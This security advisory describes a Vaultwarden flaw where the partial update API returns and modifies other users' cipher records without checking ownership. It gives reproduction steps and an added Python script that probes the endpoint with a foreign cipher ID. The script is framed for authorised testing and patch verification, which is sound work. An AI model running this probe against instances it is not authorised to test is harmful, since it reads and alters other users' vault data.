Vaultwarden Unauthorized Access Vulnerability via Partial Update API on User Ciphers
Vulnerability
A vulnerability in Vaultwarden, an unofficial Bitwarden-compatible server, allows an authenticated regular user to read and modify another user's cipher records through the partial update API. This issue affects Vaultwarden versions prior to 1.35.4. The partial update endpoint does not verify that the cipher ID supplied by the caller belongs to the caller, so any authenticated user who knows or guesses a cipher ID can act on that record and receives its details in the response, including the name, notes and stored secure data. In filesystem deployments the same missing check also exposes attachment data through a tokenized attachment endpoint, which can contribute to account compromise and further secondary impact.
Impact
Exploitation gives an authenticated user unauthorized read and write access to cipher records belonging to other users on the same instance, including stored names, notes and login data, and in filesystem deployments to their attachments; this can be leveraged to compromise accounts and to move laterally within the environment. One caveat worth keeping in mind when assessing impact: Bitwarden-compatible clients encrypt cipher fields and attachments before uploading them, so what the server returns to the attacker is ciphertext under the victim's account key together with unencrypted metadata such as record and folder identifiers. The missing ownership check, and the ability to alter another user's record through it, remain the core of the issue regardless of what the attacker can decrypt.
Reproduction
To reproduce this vulnerability, an authenticated regular user needs a valid JWT for their own account and the cipher ID of an item owned by a different user. First confirm that the standard cipher retrieval endpoint refuses the request for that cipher ID, which is the expected behaviour because the caller is not the owner. Then send a request carrying the same cipher ID to the partial update endpoint. On an unpatched server the request succeeds with a 200 OK and the response body discloses the cipher details, including the name, notes and any attachment records, where a denial should have been returned. Because the partial update endpoint is a write operation, perform this check only against an instance you are authorised to test.
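The comparison described above, written as a small check script. This is an added example and not code from the advisory or from the Vaultwarden project. It assumes the Bitwarden-compatible routes GET /api/ciphers/{id} and PUT /api/ciphers/{id}/partial, a JSON body of the form {"folderId": null, "favorite": false} for the partial update, and that the unpatched server answers the partial update with a 200 and a JSON cipher object; the transport is injectable so the decision logic can be exercised offline with constructed responses.

```python
"""Check whether a Vaultwarden instance exposes another user's cipher through
the partial update route (added example; route paths and body shape are
assumptions about the Bitwarden-compatible API, not taken from the advisory)."""
import argparse
import json
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Callable, Optional, Tuple


@dataclass
class Response:
    status: int
    body: dict


# A transport takes (method, url, headers, json_body) and returns a Response.
Transport = Callable[[str, str, dict, Optional[dict]], Response]


def http_transport(method: str, url: str, headers: dict, body: Optional[dict]) -> Response:
    """Standard-library HTTP transport. Only used when passed explicitly, so the
    decision logic below can be tested without network access."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(url, data=data, method=method, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            raw = resp.read()
            return Response(resp.status, json.loads(raw) if raw else {})
    except urllib.error.HTTPError as err:
        raw = err.read()
        try:
            parsed = json.loads(raw) if raw else {}
        except json.JSONDecodeError:
            parsed = {}
        return Response(err.code, parsed)


def check_partial_update(base_url: str, jwt: str, cipher_id: str,
                         transport: Transport = http_transport) -> Tuple[str, str]:
    """Return (verdict, details).

    'vulnerable'     : direct read of the cipher was refused, but the partial
                       update route returned 200 with cipher data for the same id.
    'not-vulnerable' : both routes refused the request (expected on a patched server).
    'own-cipher'     : the caller can read the cipher directly, so it is not a
                       suitable target; no write is attempted in that case.
    """
    headers = {"Authorization": f"Bearer {jwt}", "Content-Type": "application/json"}
    base = base_url.rstrip("/")

    # Step 1: the standard retrieval route must deny access for a foreign cipher.
    direct = transport("GET", f"{base}/api/ciphers/{cipher_id}", headers, None)
    if direct.status == 200:
        return "own-cipher", "caller can read this cipher directly; choose a cipher owned by another user"

    # Step 2: the partial update route with the same id. This is a write on the
    # server side, so only run it against an instance you are authorised to test.
    # Assumed body shape: folderId and favorite (camelCase) as in the Bitwarden API.
    partial = transport("PUT", f"{base}/api/ciphers/{cipher_id}/partial", headers,
                        {"folderId": None, "favorite": False})
    if partial.status == 200:
        leaked = sorted(k for k in partial.body
                        if k.lower() in {"name", "notes", "attachments", "login"})
        return "vulnerable", f"GET returned {direct.status}; PUT /partial returned 200 with fields {leaked}"
    return "not-vulnerable", f"GET returned {direct.status}; PUT /partial returned {partial.status}"


if __name__ == "__main__":
    ap = argparse.ArgumentParser(description="Vaultwarden partial-update ownership check")
    ap.add_argument("base_url", help="e.g. https://vault.example.test (assumed, your own instance)")
    ap.add_argument("jwt", help="access token of the low-privilege test account")
    ap.add_argument("cipher_id", help="UUID of a cipher owned by a different test account")
    args = ap.parse_args()
    verdict, details = check_partial_update(args.base_url, args.jwt, args.cipher_id)
    print(f"{verdict}: {details}")
```

The injectable transport is the design point: the two-request comparison is the whole test, so the script keeps that logic separate from the network and refuses to issue the write when the caller turns out to own the cipher.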
Remediation
Upgrade to Vaultwarden version 1.35.4 or later, where the partial update endpoint enforces the ownership check; earlier releases remain exposed to any authenticated user on the instance.
